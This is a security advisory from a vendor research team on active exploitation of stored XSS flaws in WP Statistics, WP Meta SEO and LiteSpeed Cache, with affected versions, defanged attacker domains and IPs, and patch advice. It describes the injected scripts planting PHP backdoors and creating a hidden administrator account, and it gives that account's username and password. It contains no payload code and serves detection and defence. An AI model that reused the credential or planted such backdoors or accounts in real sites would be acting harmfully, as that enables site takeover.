Active Exploitation of Stored XSS Vulnerabilities in WordPress Plugins (CVE-2024-2194, CVE-2023-6961, CVE-2023-40000)

Bar Refael

June 3, 2024

Recent cyberattacks have exploited stored cross-site scripting (XSS) vulnerabilities in several popular WordPress plugins. The affected plugins include WP Statistics, WP Meta SEO, and LiteSpeed Cache, with vulnerabilities identified as CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000. These vulnerabilities stem from inadequate input sanitization and output escaping, allowing attackers to inject malicious scripts.

Vulnerability Overview

CVE-2024-2194:

  • Affected Plugin: WP Statistics (versions 14.5 and earlier)
  • Vulnerability: Stored XSS via the URL search parameter
  • Active Installations: Over 600,000
  • Disclosure Date: March 11, 2024

CVE-2023-6961:

  • Affected Plugin: WP Meta SEO (versions 4.5.12 and earlier)
  • Vulnerability: Stored XSS via the Referer HTTP header
  • Active Installations: Over 20,000
  • Disclosure Date: April 16, 2024

CVE-2023-40000:

  • Affected Plugin: LiteSpeed Cache (versions 5.7.0.1 and earlier)
  • Vulnerability: Stored XSS through ‘nameservers’ and ‘_msg’ parameters
  • Active Installations: Over 5 million
  • Disclosure Date: February 2024

Technical Details

Malicious JavaScript injected through these vulnerabilities can:

  1. Inject Malicious PHP Backdoors:
    • Into plugin and theme files.
  2. Create a New Administrator Account:
    • Username: admin
    • Password: 7F9SzCnS6g3AFLAO39Ro
  3. Initiate Tracking:
    • Implement tracking via JavaScript or a tracking pixel.

Threat Actor Activity

  • CVE-2024-2194:
    • Domain: media.cdnstaticjs[.]com
    • Geographic Concentration: Primarily from the Netherlands
  • CVE-2023-6961:
    • Domain: idc.cloudiync[.]com
    • Exploitation Attempts: Over 5 billion requests
  • CVE-2023-40000:
    • Domains: cloud.cdndynamic[.]com, go.kcloudinc[.]com, cdn.mediajsdelivery[.]com
    • IP Addresses: Distributed across 1664 distinct IP addresses

Indicators of Compromise (IoCs)

Domains:

  • media.cdnstaticjs[.]com
  • cloud.cdndynamic[.]com
  • idc.cloudiync[.]com
  • cdn.mediajsdelivery[.]com
  • go.kcloudinc[.]com
  • assets.scontentflow[.]com
  • cache.cloudswiftcdn[.]com

IP Addresses:

  • 80.82.76[.]214
  • 31.43.191[.]220
  • 94.102.51[.]144
  • 94.102.51[.]95
  • 91.223.82[.]150
  • 185.7.33[.]129
  • 101.99.75[.]178
  • 94.242.61[.]217
  • 80.82.78[.]133
  • 111.90.150[.]154
  • 103.155.93[.]120
  • 185.100.87[.]144
  • 185.162.130[.]23
  • 101.99.75[.]215
  • 111.90.150[.]123
  • 103.155.93[.]244
  • 185.209.162[.]247
  • 179.43.172[.]148
  • 185.159.82[.]103
  • 185.247.226[.]37
  • 185.165.169[.]62

Mitigation and Recommendations

  1. Update Affected Plugins: Apply patches for WP Statistics (version 14.5+), WP Meta SEO (version 4.5.13+), and LiteSpeed Cache (version 5.7.1+).
  2. Monitor for IoCs: Implement monitoring to detect malicious activity related to identified domains and IP addresses.
  3. Strengthen Security Posture: Enhance input sanitization and output escaping practices to prevent future XSS vulnerabilities

Stay Secure. Stay Informed.

OP Innovate Research Team.

Under Cyber Attack?

Fill out the form and we will contact you immediately.

Get OP Innovate CTI Alerts

Leave your email and get critical updates and alerts straight to your inbox